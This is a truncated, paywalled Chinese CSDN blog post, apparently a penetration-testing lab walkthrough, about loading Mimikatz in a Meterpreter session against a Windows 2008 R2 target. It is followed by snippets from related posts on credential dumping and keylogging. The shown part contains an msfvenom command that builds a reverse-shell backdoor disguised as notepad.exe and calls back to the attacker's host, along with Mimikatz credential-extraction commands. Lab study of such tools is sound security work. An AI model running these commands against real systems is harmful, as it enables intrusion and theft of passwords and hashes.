Mimikatz on meterpreter

已于 2022-04-05 00:13:30 修改
阅读量212 收藏
点赞数
分类专栏: 域渗透 内网渗透 文章标签: 安全
于 2019-08-31 23:26:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41082546/article/details/100178706
版权
本文介绍了在Kali Linux主机上针对Win2008 R2靶机进行渗透测试的步骤,包括生成后门exe、利用Meterpreter加载Mimikatz模块以获取系统凭据、服务信息、证书等,并演示了如何进行提权、检查虚拟机、清除日志等操作。
摘要由CSDN通过智能技术生成

实验环境:

kali 主机:192.168.88.193

目标靶机:win2008 R2 192.168.88.130

kali 主机上执行生成一个后门 exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPORT=443 -f exe -o notepad.exe

msfconsole -r msf.rc

meterpreter > load mimikatz // 加载 mimizkatz

Mimikatz Commands

=================

Command Description

------- -----------

kerberos Attempt to retrieve kerberos creds.</

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Micr067
关注
专栏目录
订阅专栏
MSF中mimikatz模块的使用
谢公子的博客
11-10 4105
目录 mimikatz模块的加载 mimikatz_command模块的用法 Kerberos模块 Livessp模块 MSV模块(列出密码哈希) SSP模块 tspkg模块 Wdigest模块 mimikatz模块的加载 mimikatz模块的使用需要Administrator权限或者System权限。MSF中自带mimikatz模块,MSF中的 mimikatz 模块同时支...
MSF中mimikatz模块的使用 编程
ByteKnight的博客
08-13 282
mimikatz是一款功能强大的开源工具,用于在Windows系统中提取凭据,包括明文密码、哈希值以及域密钥等。通过本文,你应该对如何在MSF中使用mimikatz模块进行编程有了一定的了解。通过结合这两个强大的工具,你可以扩展渗透测试和漏洞验证的能力,并提高安全审计的效率。请记住,任何形式的攻击活动必须在法律允许的范围内进行,并且仅用于合法目的,如红队活动、安全评估和授权渗透测试等。以上代码通过调用MSF的API,创建了一个用于执行mimikatz的自定义模块。是你在MSF中建立的会话ID。
meterpreter中使用mimikatz获取windows密码
浅笑996的博客
07-01 4264
进去meterpreter后getuid一下 这获得系统管理员权限 开始 加载mimikatz模块 load mimikatz 加载成功. 第一种方法: 获取登录密码的hash值 msv 上面已经是得到hash值了. 下面算明文密码. 获取明文密码 kerberos look...拿到登录的明文密码了. 第二种方法: 使用另一种方式获取哈希值 mimikatz_command -f samdump::hashes 根据上面的方式获取明文密码 ...
meterpreter使用详解
lweiheng blog
01-07 4097
meterpreter使用详解 文章目录meterpreter使用详解0 meterpreter简介1 meterpreter控制技巧总结1.1 命令详解1.2 sessions 控制命令1.3 meterpreter收集信息1.3.1 meterpreter 收集windows主机信息1.3.1.1 收集系统信息1.3.1.2 收集本地(域)用户信息1.3.1.3 收集当前用户信息1.3.1.4...
红队专题-Meterpreter
aming小老弟
09-06 707
Metasploit是一款开源的安全漏洞检测 渗透测试 工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
Kali破解windows系统用户名密码工具mimikatz
世间繁华梦一出
07-20 4964
mimikatz工具简介 mimikatz是一款强大的系统密码破解获取工具。该工具有段时间是作为一个独立程序运行。现在已被添加到Metasploit框架中,并作为一个可加载的Meterpreter模块。当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。本节将介绍使用mimikatz工具恢复密码。 windows2012以下的系统给可直接获取到明文,2012以上的系统只能获取到hash值。 实例演示 (1)通过在目标主机(Windows 7)上运行kali创建的可执行文件木马程序bac
Mimikatz获取系统密码攻防研究
weixin_44023460的博客
06-23 4620
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为Win32位(多了一个mimilove.exe文件)和X64位。通过它们可以提升进程权限、注
Pentest - Mimikatz
Nixawk
09-12 7403
Active Directory supports two primary authentication protoc ols, NTLM and Kerberos. Modern Windows versions default to Kerberos authentication. NTLM suffers from two main weaknesses: 1) the NTLM pass
msf中使用mimikatz加载用户明文密码
qq_36992014的博客
05-08 893
meterpreter > load mimikatz meterpreter > creds_kerberos 可以获得明文密码 mimikatz 之后改名为kiwi 使用 meterpreter > help kiwi 帮助信息,以后探索
cs与msf权限传递,以及mimikatz抓取明文密码
M372109150的博客
06-15 1330
cs与msf权限传递,以及mimikatz抓取win10明文密码
ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
weixin_48710435的博客
08-05 2708
一、实验环境: 1、攻击机:KaliIP:192.168.218.157 1)攻击工具:msf 2)分析工具:wireshark 2、靶 机:Windows7(旗舰版) IP:192.168.218.160 1)开启网络共享(SMB协议) 2)关闭防火墙 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: 1、测试攻击机与靶机的连通性 2.进行MS17-010漏洞扫描 1)启动msf 命令:msfconsole ...
探索 Mimikatz 神器之 WDigest
systemino的博客
07-04 2565
自从 Mimikatz 出现以来,我们很多人已经对这个工具进行过封装,也尝试过注入,或者是使用 powershell 实现类似的功能。现在我们决定给这个工具添加一个内存 dump 的功能,无论我们如何封装使用 Mimikatz,它仍然是 Windows 系统中从 lsass 进程中提取凭证的首选工具。 当然,这是因为微软引入的每一个新的安全措施,GentilKiwi 总会有对应的“诡计”。 如果你...
Meterpreter命令详解
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
msf进阶
2301_77147676的博客
03-23 153
在得到目标机shell后的进阶使用Keyscan_strat:开启键盘记录功能Keyscan_dump:显示捕捉到的键盘记录信息Keyscan_stop:停止键盘记录在mimikatz模块,能获取目标主机的哈希和明文密码,常用命令:以下均在msfconsole中运行Load mimikatz:加载mimikatzMsv:获取hashKerberos:获取明文密码Widigest:获取系统账户信息。
harbor v1/_ping: dial tcp 192.168.1.193:443 错误
海洋专栏
04-19 1861
以前在用docker私库registry的时候,会遇到这个问题,harbor既然是仓库也会遇到这个问题。 主要是,应该是http连接,所以,要修改docker仓库的配置文件即可。 注意端口号,如果有,需要加上。 [root@k8s1 /]# cat /etc/docker/daemon.json { "insecure-registries": ["192.168.1.193"] } ...
学习笔记-Mimikatz
人饭子的博客
11-02 747
Mimikatz 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 项目地址 https://github.com/gentilkiwi/mimikatz 文章 & Reference 九种姿势运行 Mimikatz Mimikatz 使用小技巧 域渗透——Dump Clear-Text Password after ...
mimikatz实战域渗透抓取域控管理员密码
热门推荐
404
02-07 1万+
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这里攻击利用的msf里面的regsvr32_applocker_bypass_ser
mimikatz排查
最新发布
07-30
Mimikatz是一款小巧而强大的Windows密码提取工具,它主要用于检测和提取系统中的各种凭据信息,如SAM哈希、Lsa Secrets、TGT令牌等,通常用于安全审计、取证分析和漏洞评估场景。如果你遇到疑似Mimikatz活动的问题,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Micr067

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值